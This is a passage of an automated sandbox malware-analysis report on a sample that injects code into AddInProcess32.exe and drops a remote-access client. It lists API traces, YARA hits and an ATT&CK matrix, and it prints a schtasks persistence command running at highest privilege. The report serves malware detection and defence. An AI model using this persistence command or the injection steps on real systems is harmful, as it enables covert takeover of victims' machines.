                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,7_2_11092090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_1115E3E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116A469
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,7_2_11030A50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD628E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6CD628E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD687F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6CD687F5
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE7ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,7_2_6CE7ADFC
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE00807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_6CE00807
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,9_2_11092090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1115E3E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1116A469
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,9_2_11030A50
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Allocates memory in foreign processes
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Injects a PE file into a foreign processes
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                                Writes to foreign memory regions
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 419000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 422000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 424000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 425000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 427000Jump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C4B008Jump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe7_2_1102FB50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe9_2_1102FB50
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError,7_2_110F21E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00401A80 GetProcessHeap,RegOpenKeyW,lstrlenW,RegSetValueExW,RegCloseKey,GetProcessHeap,GetProcessHeap,HeapAlloc,GetSystemDirectoryW,HeapFree,GetProcessHeap,HeapAlloc,wsprintfW,GetProcessHeap,HeapAlloc,HeapFree,wsprintfW,ShellExecuteW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_00401A80
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1110F530 GetKeyState,DeviceIoControl,keybd_event,7_2_1110F530
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHESTJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D240
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,7_2_1109D9C0
                                Source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drBinary or memory string: Progman
                                Source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drBinary or memory string: Progman<
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407B48 cpuid 4_2_00407B48
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_111700E5
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170376
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_11170419
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoA,7_2_11167A6E
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_1116FFE3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_1116FEEE
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_1117008A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_111703DD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_111702B6
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_6CD71CC1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoA,7_2_6CD7DC99
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_6CD7DC56
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_6CD71DB6
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_6CD71EB8
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_6CD71E5D
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_6CD70F39
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,7_2_6CD6FAE1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_6CD7DB7C
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,7_2_6CD71680
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_6CD72089
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_6CD721DC
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: EnumSystemLocalesA,7_2_6CD72151
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_6CD72175
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_6CD702AD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_6CD71257
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_6CD72218
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,7_2_6CE0888A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,free,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,___wtomb_environ,_malloc_crt,_malloc_crt,free,__recalloc_crt,__recalloc_crt,_strlen,_calloc_crt,_strlen,strcpy_s,SetEnvironmentVariableA,_errno,free,free,__invoke_watson,7_2_6CE08468
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,7_2_6CE065F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,7_2_6CE085AC
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,WideCharToMultiByte,_freea_s,7_2_6CE086E1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,7_2_6CE086FD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,7_2_6CE0871C
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,9_2_11170419
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoA,9_2_11167A6E
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,9_2_1116FFE3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_1116FEEE
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,9_2_1117008A
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,9_2_111700E5
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_11170376
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_111703DD
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,9_2_111702B6
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Users\user\Desktop\Jjv9ha2GKn.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,7_2_110F1070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00407771 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00407771
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free,7_2_1103B170
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11171199 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,7_2_11171199
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D240
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,7_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,7_2_110D5D90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CD4A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,7_2_6CD4A980
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,9_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,9_2_110D5D90
                                Source: Yara matchFile source: 9.2.client32.exe.6f6f0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.6ceb0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.6ceb0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.6f6f0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.6cd40000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 828, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6044, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                Exploitation for Privilege Escalation                                		11
                                Disable or Modify Tools                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		2
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts14
                                Native API                                		2
                                Valid Accounts                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		21
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job                                		1
                                Windows Service                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		11
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Scheduled Task/Job                                		21
                                Access Token Manipulation                                		1
                                Software Packing                                		NTDS45
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		3
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                Windows Service                                		1
                                Timestomp                                		LSA Secrets251
                                Security Software Discovery                                		SSHKeylogging4
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts323
                                Process Injection                                		1
